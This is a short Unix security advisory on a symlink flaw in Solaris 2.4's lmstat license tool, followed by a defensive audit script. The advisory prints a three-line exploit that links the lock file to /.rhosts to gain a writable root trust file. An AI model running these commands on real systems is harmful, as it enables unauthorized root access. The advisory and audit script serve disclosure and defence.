COMMAND

    lmstat (license manager)

SYSTEMS AFFECTED

    Solaris 2.4

PROBLEM

    The following vulnerability was posted by Grant Kaufmann. The
    license manager must be running; expect both lmgrd.ste & suntechd
    to be somewhere in your process table.

    /var/tmp/locksuntechd will be created by anyone who runs lmstat,
    with perms 666 and quite happy to follow symlinks. Anyway,
    here's the exploit.

        rm /var/tmp/locksuntechd
        ln -s /.rhosts /var/tmp/locksuntechd
        lmstat -c <insert your license file name here>

    lmstat could be anywhere on your filesystem. Sometimes this won't
    work first time. It won't create the file. Just run lmstat again
    and it'll work.

SOLUTION

    Dunno. If there is no fix from Sun, remove execute permission
    for others.
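
    An audit check for the two conditions above (the state of the lock
    file, and whether the workaround has been applied), added here as an
    example and not part of the original post. It assumes a POSIX shell;
    the function names and the lmstat location in the usage line are
    hypothetical.

```shell
#!/bin/sh
# Added example: audit the lock file named in the advisory and the
# "remove execute permission for others" workaround.

# lock_state PATH: prints absent | symlink | world-writable | ok
lock_state() {
    if [ -L "$1" ]; then
        echo symlink            # a link here redirects lmstat's write
    elif [ ! -e "$1" ]; then
        echo absent
    elif [ -n "$(find "$1" -prune -perm -002)" ]; then
        echo world-writable     # the 666 mode the advisory reports
    else
        echo ok
    fi
}

# others_can_exec PATH: prints yes if the "other" execute bit is set
others_can_exec() {
    if [ -n "$(find "$1" -prune -perm -001)" ]; then
        echo yes
    else
        echo no
    fi
}

# audit LOCK LMSTAT: prints findings; exit status is the finding count
audit() {
    n=0
    state=$(lock_state "$1")
    case $state in
        symlink|world-writable)
            echo "FINDING: $1 is $state: $(ls -ld "$1")"
            n=$((n + 1)) ;;
    esac
    if [ -e "$2" ] && [ "$(others_can_exec "$2")" = yes ]; then
        echo "NOTE: $2 is still executable by others"
        n=$((n + 1))
    fi
    return $n
}

# Usage (the lmstat path is site-specific; this one is a placeholder):
#   audit /var/tmp/locksuntechd /path/to/lmstat
```

    A "symlink" finding means the lock path was replaced before lmstat
    ran; check where the link points and the mode of that target.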